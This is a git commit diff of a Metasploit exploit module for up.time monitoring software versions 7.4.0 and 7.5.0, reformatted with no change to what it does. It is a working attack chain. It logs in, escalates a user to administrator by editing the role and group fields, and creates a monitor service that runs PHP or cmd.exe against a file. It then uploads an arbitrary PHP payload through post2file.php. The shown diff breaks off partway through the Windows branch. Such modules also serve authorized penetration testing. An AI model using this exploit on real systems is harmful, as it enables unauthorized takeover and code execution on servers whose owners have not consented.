Ewerson Guimaraes (Crash)
parent
252e80e793
commit
6250983fb4
|
|
@ -4,510 +4,478 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::PhpEXE
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::PhpEXE
|
||||
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Uptime Version 7.4.0 / 7.5.0 Upload and Exec file",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0 By
|
||||
supplying a specially crafted request is possible to upload file and execute arbitrary
|
||||
commands through privilege escalation.
|
||||
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
|
||||
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>',
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', ''],
|
||||
['OSVDB', ''],
|
||||
['US-CERT-VU', '']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 100000, # just a big enough number to fit any PHP payload
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => false
|
||||
},
|
||||
'Privileged' => 'True',
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 6 2015'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9999),
|
||||
OptString.new("USERNAME", [true, 'The username to authenticate as']),
|
||||
OptString.new("PASSWORD", [true, 'The password to authenticate with']),
|
||||
], self.class)
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file',
|
||||
'Description' => '
|
||||
This module exploits a vulnerability found in Uptime
|
||||
version 7.4.0 and 7.5.0 By supplying a specially
|
||||
crafted request is possible to upload file and execute
|
||||
arbitrary commands through privilege escalation.
|
||||
',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
|
||||
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', ''],
|
||||
['OSVDB', ''],
|
||||
['US-CERT-VU', '']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 100_000,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', {}]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => false
|
||||
},
|
||||
'Privileged' => 'True',
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 6 2015'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9999),
|
||||
OptString.new('USERNAME', [true, 'The username to authenticate as']),
|
||||
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
|
||||
], self.class)
|
||||
end
|
||||
################################Application Check##############################
|
||||
def check
|
||||
sig = "up.time 7.5.0"
|
||||
sig2 = "up.time 7.4.0"
|
||||
# ###############################Application Check##############################
|
||||
def check
|
||||
sig = 'up.time 7.5.0'
|
||||
sig2 = 'up.time 7.4.0'
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/'
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => '/')
|
||||
|
||||
} )
|
||||
print_status("#{rhost}:#{rport} - Checking version...")
|
||||
|
||||
print_status("#{rhost}:#{rport} - Checking version...")
|
||||
if res.code == 200 && res.body =~ /#{sig}/ || res.code == 200 && res.body =~ /#{sig2}/
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
if res.code == 200 && res.body =~ /#{sig}/ || res.code == 200 && res.body =~ /#{sig2}/
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
def exploit
|
||||
print_status('Trying to login...')
|
||||
# ############################Application Login###########################
|
||||
res_auth = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => '/index.php?',
|
||||
'vars_post' => {
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
})
|
||||
|
||||
|
||||
def exploit
|
||||
print_status("Trying to login...")
|
||||
#############################Application Login###########################
|
||||
res_auth = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/index.php?',
|
||||
'vars_post' => {
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
|
||||
}
|
||||
} )
|
||||
|
||||
#############################Check OS #####################################
|
||||
# ############################Check OS #####################################
|
||||
if res_auth.headers['Server'] =~ /Unix/
|
||||
print_status("Found Linux instalation - Setting appropriated PATH")
|
||||
phppath = "/usr/local/uptime/apache/bin/php"
|
||||
uploadpath = "/usr/local/uptime/GUI/wizards"
|
||||
print_status('Found Linux instalation - Setting appropriated PATH')
|
||||
phppath = '/usr/local/uptime/apache/bin/php'
|
||||
uploadpath = '/usr/local/uptime/GUI/wizards'
|
||||
else
|
||||
print_status("Found Windows instalation - Setting appropriated PATH")
|
||||
phppath = "C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe"
|
||||
uploadpath = "C:\\Program Files\\uptime software\\uptime\\GUI\\wizards"
|
||||
|
||||
print_status('Found Windows instalation - Setting appropriated PATH')
|
||||
phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe'
|
||||
uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards'
|
||||
end
|
||||
###########################################################################
|
||||
###########################################################################
|
||||
|
||||
if res_auth && res_auth.get_cookies =~ /login=true/
|
||||
cookie = Regexp.last_match(1)
|
||||
cookie_split = res_auth.get_cookies.split(';')
|
||||
print_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
|
||||
print_good('Login success')
|
||||
|
||||
if res_auth and res_auth.get_cookies =~ /login=true/
|
||||
cookie = $1
|
||||
cookie_split = res_auth.get_cookies.split(";")
|
||||
print_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
|
||||
print_good("Login success")
|
||||
# #####################Privilege escalation getting user ID#################
|
||||
res_priv = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => '/main.php',
|
||||
'vars_get' =>
|
||||
{
|
||||
'page' => 'Users',
|
||||
'subPage' => 'UserContainer'
|
||||
},
|
||||
'headers' =>
|
||||
{
|
||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control' => 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
})
|
||||
matchdata = res_priv.body.match(/UPTIME.CurrentUser.userId.*/)
|
||||
get_id = matchdata[0].gsub(/[^\d]/, '')
|
||||
print_status('Escalating privileges...')
|
||||
|
||||
# #####################Privilege escalation post####################################
|
||||
res_priv_elev = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => '/main.php',
|
||||
'vars_get' =>
|
||||
{
|
||||
'section' => 'UserContainer',
|
||||
'subsection' => 'edit',
|
||||
'id' => "#{get_id}"
|
||||
},
|
||||
'headers' =>
|
||||
{
|
||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control' => 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
},
|
||||
'vars_post' =>
|
||||
{
|
||||
'operation' => 'submit',
|
||||
'disableEditOfUsernameRoleGroup' => 'false',
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD'],
|
||||
'passwordConfirm' => datastore['PASSWORD'],
|
||||
'firstname' => rand_text_alpha(10),
|
||||
'lastname' => rand_text_alpha(10),
|
||||
'location' => '',
|
||||
'emailaddress' => '',
|
||||
'emailtimeperiodid' => '1',
|
||||
'phonenumber' => '',
|
||||
'phonenumbertimeperiodid' => '1',
|
||||
'windowshost' => '',
|
||||
'windowsworkgroup' => '',
|
||||
'windowspopuptimeperiodid' => '1',
|
||||
'landingpage' => 'MyPortal',
|
||||
'isonvacation' => '0',
|
||||
'receivealerts' => '0',
|
||||
'activexgraphs' => '0',
|
||||
'newuser' => 'on',
|
||||
'newuser' => '1',
|
||||
'userroleid' => '1',
|
||||
'usergroupid[]' => '1'
|
||||
})
|
||||
# #################################Refresing perms.###################################################################
|
||||
print_status('Refresing perms...')
|
||||
res_priv = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => '/index.php?loggedout',
|
||||
'headers' =>
|
||||
{
|
||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control' => 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
}
|
||||
)
|
||||
|
||||
######################Privilege escalation getting user ID#################
|
||||
res_priv = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/main.php',
|
||||
'vars_get' => {
|
||||
'page' => 'Users',
|
||||
'subPage' => 'UserContainer'
|
||||
},
|
||||
'headers' => {
|
||||
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control'=> 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0',
|
||||
}
|
||||
res_auth = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => '/index.php',
|
||||
'vars_post' =>
|
||||
{
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
|
||||
}
|
||||
)
|
||||
matchdata=res_priv.body.match(/UPTIME.CurrentUser.userId.*/)
|
||||
})
|
||||
if res_auth && res_auth.get_cookies =~ /login=true/
|
||||
cookie = Regexp.last_match(1)
|
||||
cookie_split = res_auth.get_cookies.split(';')
|
||||
print_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
|
||||
print_good('Priv. Escalation success')
|
||||
end
|
||||
|
||||
get_id= matchdata[0].gsub(/[^\d]/, '')
|
||||
# #########CREATING EXEC Service#################################################
|
||||
phpfile_name = rand_text_alpha(10)
|
||||
# #########CREATING Linux EXEC Service#################################################
|
||||
if res_auth.headers['Server'] =~ /Unix/
|
||||
print_status('Creating Linux Monitor Code exec...')
|
||||
res_service = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => '/main.php',
|
||||
'headers' =>
|
||||
{
|
||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control' => 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
},
|
||||
'vars_get' =>
|
||||
{
|
||||
'section' => 'ERDCInstance',
|
||||
'subsection' => 'add'
|
||||
},
|
||||
'vars_post' =>
|
||||
{
|
||||
'initialERDCId' => '20',
|
||||
'target' => '1',
|
||||
'targetType' => 'systemList',
|
||||
'systemList' => '1',
|
||||
'serviceGroupList' => '-10',
|
||||
'initialMode' => 'standard',
|
||||
'erdcName' => 'Exploit',
|
||||
'erdcInitialName' => '',
|
||||
'erdcDescription' => 'Exploit',
|
||||
'hostButton' => 'system',
|
||||
'erdc_id' => '20',
|
||||
'forceReload' => '0',
|
||||
'operation' => 'standard',
|
||||
'erdc_instance_id' => '',
|
||||
'label_[184]' => 'Script Name',
|
||||
'value_[184]' => phppath,
|
||||
'id_[184]' => 'process',
|
||||
'name_[process]' => '184',
|
||||
'units_[184]' => '',
|
||||
'guiBasic_[184]' => '1',
|
||||
'inputType_[184]' => 'GUIString',
|
||||
'screenOrder_[184]' => '1',
|
||||
'parmType_[184]' => '1',
|
||||
'label_[185]' => 'Arguments',
|
||||
'value_[185]' => uploadpath + '/' + phpfile_name + '.txt',
|
||||
'id_[185]' => 'args',
|
||||
'name_[args]' => '185',
|
||||
'units_[185]' => '',
|
||||
'guiBasic_[185]' => '1',
|
||||
'inputType_[185]' => 'GUIString',
|
||||
'screenOrder_[185]' => '2',
|
||||
'parmType_[185]' => '1',
|
||||
'label_[187]' => 'Output',
|
||||
'can_retain_[187]' => 'false',
|
||||
'comparisonWarn_[187]' => '-1',
|
||||
'comparison_[187]' => '-1',
|
||||
'id_[187]' => 'value_critical_output',
|
||||
'name_[output]' => '187',
|
||||
'units_[187]' => '',
|
||||
'guiBasic_[187]' => '1',
|
||||
'inputType_[187]' => 'GUIString',
|
||||
'screenOrder_[187]' => '4',
|
||||
'parmType_[187]' => '2',
|
||||
'label_[189]' => 'Response time',
|
||||
'can_retain_[189]' => 'false',
|
||||
'comparisonWarn_[189]' => '-1',
|
||||
'comparison_[189]' => '-1',
|
||||
'id_[189]' => 'value_critical_timer',
|
||||
'name_[timer]' => '189',
|
||||
'units_[189]' => 'ms',
|
||||
'guiBasic_[189]' => '0',
|
||||
'inputType_[189]' => 'GUIInteger',
|
||||
'screenOrder_[189]' => '6',
|
||||
'parmType_[189]' => '2',
|
||||
'timing_[erdc_instance_monitored]' => '1',
|
||||
'timing_[timeout]' => '60',
|
||||
'timing_[check_interval]' => '10',
|
||||
'timing_[recheck_interval]' => '1',
|
||||
'timing_[max_rechecks]' => '3',
|
||||
'alerting_[notification]' => '1',
|
||||
'alerting_[alert_interval]' => '120',
|
||||
'alerting_[alert_on_critical]' => '1',
|
||||
'alerting_[alert_on_warning]' => '1',
|
||||
'alerting_[alert_on_recovery]' => '1',
|
||||
'alerting_[alert_on_unknown]' => '1',
|
||||
'time_period_id' => '1',
|
||||
'pageFinish' => 'Finish',
|
||||
'pageContinue' => 'Continue...',
|
||||
'isWizard' => '1',
|
||||
'wizardPage' => '2',
|
||||
'wizardNumPages' => '2',
|
||||
'wizardTask' => 'pageFinish',
|
||||
'visitedPage[1]' => '1',
|
||||
'visitedPage[2]' => '1'
|
||||
})
|
||||
|
||||
print_status("Escalating privileges...")
|
||||
|
||||
######################Privilege escalation post####################################
|
||||
res_priv_elev = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/main.php',
|
||||
'vars_get' => {
|
||||
'section' => 'UserContainer',
|
||||
'subsection' => 'edit',
|
||||
'id' => "#{get_id}"
|
||||
},
|
||||
'headers' => {
|
||||
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control'=> 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0',
|
||||
},
|
||||
'vars_post' => {
|
||||
'operation' =>'submit',
|
||||
'disableEditOfUsernameRoleGroup' =>'false',
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD'],
|
||||
'passwordConfirm' => datastore['PASSWORD'],
|
||||
'firstname' => rand_text_alpha(10),
|
||||
'lastname' => rand_text_alpha(10),
|
||||
'location' =>'',
|
||||
'emailaddress' =>'',
|
||||
'emailtimeperiodid' =>'1',
|
||||
'phonenumber' =>'',
|
||||
'phonenumbertimeperiodid' =>'1',
|
||||
'windowshost' =>'',
|
||||
'windowsworkgroup' =>'',
|
||||
'windowspopuptimeperiodid' =>'1',
|
||||
'landingpage' =>'MyPortal',
|
||||
'isonvacation' =>'0',
|
||||
'receivealerts' =>'0',
|
||||
'activexgraphs' =>'0',
|
||||
'newuser' =>'on',
|
||||
'newuser' =>'1',
|
||||
'userroleid' =>'1',
|
||||
'usergroupid[]' =>'1'
|
||||
}
|
||||
} )
|
||||
|
||||
##################################Refresing perms.###################################################################
|
||||
print_status("Refresing perms...")
|
||||
res_priv = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/index.php?loggedout',
|
||||
'headers' => {
|
||||
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control'=> 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
}
|
||||
|
||||
} )
|
||||
|
||||
res_auth = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/index.php',
|
||||
'vars_post' => {
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
|
||||
}
|
||||
} )
|
||||
|
||||
if res_auth and res_auth.get_cookies =~ /login=true/
|
||||
cookie = $1
|
||||
cookie_split = res_auth.get_cookies.split(";")
|
||||
print_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
|
||||
print_good("Priv. Escalation success")
|
||||
end
|
||||
|
||||
##########CREATING EXEC Service#################################################
|
||||
phpfile_name = rand_text_alpha(10)
|
||||
##########CREATING Linux EXEC Service#################################################
|
||||
if res_auth.headers['Server'] =~ /Unix/
|
||||
print_status("Creating Linux Monitor Code exec...")
|
||||
res_service = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/main.php',
|
||||
'headers' =>{
|
||||
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control'=> 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
},
|
||||
'vars_get' => {
|
||||
'section' => 'ERDCInstance',
|
||||
'subsection' => 'add'
|
||||
|
||||
},
|
||||
'vars_post' => {
|
||||
'initialERDCId' => '20',
|
||||
'target' => '1',
|
||||
'targetType' => 'systemList',
|
||||
'systemList' => '1',
|
||||
'serviceGroupList' => '-10',
|
||||
'initialMode' => 'standard',
|
||||
'erdcName' => 'Exploit',
|
||||
'erdcInitialName' => '',
|
||||
'erdcDescription' => 'Exploit',
|
||||
'hostButton' => 'system',
|
||||
'erdc_id' => '20',
|
||||
'forceReload' => '0',
|
||||
'operation' => 'standard',
|
||||
'erdc_instance_id' => '',
|
||||
'label_[184]' => 'Script Name',
|
||||
'value_[184]' => phppath,
|
||||
'id_[184]' => 'process',
|
||||
'name_[process]' => '184',
|
||||
'units_[184]' => '',
|
||||
'guiBasic_[184]' => '1',
|
||||
'inputType_[184]' => 'GUIString',
|
||||
'screenOrder_[184]' => '1',
|
||||
'parmType_[184]' => '1',
|
||||
'label_[185]' => 'Arguments',
|
||||
'value_[185]' => uploadpath +'/'+ phpfile_name +'.txt',
|
||||
'id_[185]' => 'args',
|
||||
'name_[args]' => '185',
|
||||
'units_[185]' => '',
|
||||
'guiBasic_[185]' => '1',
|
||||
'inputType_[185]' => 'GUIString',
|
||||
'screenOrder_[185]' => '2',
|
||||
'parmType_[185]' => '1',
|
||||
'label_[187]' => 'Output',
|
||||
'can_retain_[187]' => 'false',
|
||||
'comparisonWarn_[187]' => '-1',
|
||||
'comparison_[187]' => '-1',
|
||||
'id_[187]' => 'value_critical_output',
|
||||
'name_[output]' => '187',
|
||||
'units_[187]' => '',
|
||||
'guiBasic_[187]' => '1',
|
||||
'inputType_[187]' => 'GUIString',
|
||||
'screenOrder_[187]' => '4',
|
||||
'parmType_[187]' => '2',
|
||||
'label_[189]' => 'Response time',
|
||||
'can_retain_[189]' => 'false',
|
||||
'comparisonWarn_[189]' => '-1',
|
||||
'comparison_[189]' => '-1',
|
||||
'id_[189]' => 'value_critical_timer',
|
||||
'name_[timer]' => '189',
|
||||
'units_[189]' => 'ms',
|
||||
'guiBasic_[189]' => '0',
|
||||
'inputType_[189]' => 'GUIInteger',
|
||||
'screenOrder_[189]' => '6',
|
||||
'parmType_[189]' => '2',
|
||||
'timing_[erdc_instance_monitored]' => '1',
|
||||
'timing_[timeout]' => '60',
|
||||
'timing_[check_interval]' => '10',
|
||||
'timing_[recheck_interval]' => '1',
|
||||
'timing_[max_rechecks]' => '3',
|
||||
'alerting_[notification]' => '1',
|
||||
'alerting_[alert_interval]' => '120',
|
||||
'alerting_[alert_on_critical]' => '1',
|
||||
'alerting_[alert_on_warning]' => '1',
|
||||
'alerting_[alert_on_recovery]' => '1',
|
||||
'alerting_[alert_on_unknown]' => '1',
|
||||
'time_period_id' => '1',
|
||||
'pageFinish' => 'Finish',
|
||||
'pageContinue' => 'Continue...',
|
||||
'isWizard' => '1',
|
||||
'wizardPage' => '2',
|
||||
'wizardNumPages' => '2',
|
||||
'wizardTask' => 'pageFinish',
|
||||
'visitedPage[1]' => '1',
|
||||
'visitedPage[2]' => '1'
|
||||
|
||||
}
|
||||
} )
|
||||
|
||||
else
|
||||
##########CREATING Windows EXEC Service#################################################
|
||||
print_status("Creating Windows Monitor Code exec...")
|
||||
res_service = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/main.php',
|
||||
'headers' => {
|
||||
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control'=> 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
},
|
||||
'vars_get' => {
|
||||
'section' => 'ERDCInstance',
|
||||
'subsection' => 'add'
|
||||
},
|
||||
'vars_post' => {
|
||||
'initialERDCId' => '20',
|
||||
'target' => '1',
|
||||
'targetType' => 'systemList',
|
||||
'systemList' => '1',
|
||||
'serviceGroupList' => '-10',
|
||||
'initialMode' => 'standard',
|
||||
'erdcName' => 'Exploit',
|
||||
'erdcInitialName' => '',
|
||||
'erdcDescription' => 'Exploit',
|
||||
'hostButton' => 'system',
|
||||
'erdc_id' => '20',
|
||||
'forceReload' => '0',
|
||||
'operation' => 'standard',
|
||||
'erdc_instance_id' => '',
|
||||
'label_[184]' => 'Script Name',
|
||||
'value_[184]' => 'c:\windows\system32\cmd.exe',
|
||||
'id_[184]' => 'process',
|
||||
'name_[process]' => '184',
|
||||
'units_[184]' => '',
|
||||
'guiBasic_[184]' => '1',
|
||||
'inputType_[184]' => 'GUIString',
|
||||
'screenOrder_[184]' => '1',
|
||||
'parmType_[184]' => '1',
|
||||
'label_[185]' => 'Arguments',
|
||||
'value_[185]' => "/K \"\"#{phppath}\""+" "+"\"#{uploadpath}\\#{phpfile_name}.txt""\"\" ",
|
||||
'id_[185]' => 'args',
|
||||
'name_[args]' => '185',
|
||||
'units_[185]' => '',
|
||||
'guiBasic_[185]' => '1',
|
||||
'inputType_[185]' => 'GUIString',
|
||||
'screenOrder_[185]' => '2',
|
||||
'parmType_[185]' => '1',
|
||||
'label_[187]' => 'Output',
|
||||
'can_retain_[187]' => 'false',
|
||||
'comparisonWarn_[187]' => '-1',
|
||||
'comparison_[187]' => '-1',
|
||||
'id_[187]' => 'value_critical_output',
|
||||
'name_[output]' => '187',
|
||||
'units_[187]' => '',
|
||||
'guiBasic_[187]' => '1',
|
||||
'inputType_[187]' => 'GUIString',
|
||||
'screenOrder_[187]' => '4',
|
||||
'parmType_[187]' => '2',
|
||||
'label_[189]' => 'Response time',
|
||||
'can_retain_[189]' => 'false',
|
||||
'comparisonWarn_[189]' => '-1',
|
||||
'comparison_[189]' => '-1',
|
||||
'id_[189]' => 'value_critical_timer',
|
||||
'name_[timer]' => '189',
|
||||
'units_[189]' => 'ms',
|
||||
'guiBasic_[189]' => '0',
|
||||
'inputType_[189]' => 'GUIInteger',
|
||||
'screenOrder_[189]' => '6',
|
||||
'parmType_[189]' => '2',
|
||||
'timing_[erdc_instance_monitored]' => '1',
|
||||
'timing_[timeout]' => '60',
|
||||
'timing_[check_interval]' => '10',
|
||||
'timing_[recheck_interval]' => '1',
|
||||
'timing_[max_rechecks]' => '3',
|
||||
'alerting_[notification]' => '1',
|
||||
'alerting_[alert_interval]' => '120',
|
||||
'alerting_[alert_on_critical]' => '1',
|
||||
'alerting_[alert_on_warning]' => '1',
|
||||
'alerting_[alert_on_recovery]' => '1',
|
||||
'alerting_[alert_on_unknown]' => '1',
|
||||
'time_period_id' => '1',
|
||||
'pageFinish' => 'Finish',
|
||||
'pageContinue' => 'Continue...',
|
||||
'isWizard' => '1',
|
||||
'wizardPage' => '2',
|
||||
'wizardNumPages' => '2',
|
||||
'wizardTask' => 'pageFinish',
|
||||
'visitedPage[1]' => '1',
|
||||
'visitedPage[2]' => '1'
|
||||
}
|
||||
} )
|
||||
end
|
||||
|
||||
|
||||
########Upload file###############################################
|
||||
print_status("Uploading file...")
|
||||
res_upload = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/wizards/post2file.php',
|
||||
'vars_post' => {
|
||||
'file_name' => phpfile_name + '.txt',
|
||||
'script' => payload.encoded
|
||||
|
||||
}
|
||||
} )
|
||||
|
||||
print_status("Cheking Uploaded file...")
|
||||
res_up_check = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/wizards'+ '/' + phpfile_name + '.txt',
|
||||
'headers' => {
|
||||
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control'=> 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
}
|
||||
|
||||
} )
|
||||
|
||||
if res_up_check.code == 200
|
||||
print_good("File found: #{phpfile_name}")
|
||||
else
|
||||
print_error("File not found")
|
||||
end
|
||||
|
||||
|
||||
#####Get Monitor ID##################################################################
|
||||
|
||||
print_status("Fetching Monitor ID...")
|
||||
res_mon_id = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/ajax/jsonQuery.php',
|
||||
'vars_get' => {
|
||||
'query' => 'GET_SERVICE_PAGE_ERDC_LIST',
|
||||
'iDisplayStart' => '0',
|
||||
'iDisplayLength' => '10',
|
||||
'sSearch' => 'Exploit'
|
||||
},
|
||||
'headers' => {
|
||||
'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control'=> 'max-age=0',
|
||||
else
|
||||
# #########CREATING Windows EXEC Service#################################################
|
||||
print_status('Creating Windows Monitor Code exec...')
|
||||
res_service = send_request_cgi('method' => 'POST',
|
||||
'uri' => '/main.php',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Cache-Control' => 'max-age=0',
|
||||
'Connection' => 'keep-alive',
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'Host' => "#{rhost}",
|
||||
'Referer' => "#{rhost}/index.php",
|
||||
'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'
|
||||
}
|
||||
},
|
||||
'vars_get' => {
|
||||
'section' => 'ERDCInstance',
|
||||
'subsection' => 'add'
|
||||
},
|
||||
'vars_post' => {
|
||||
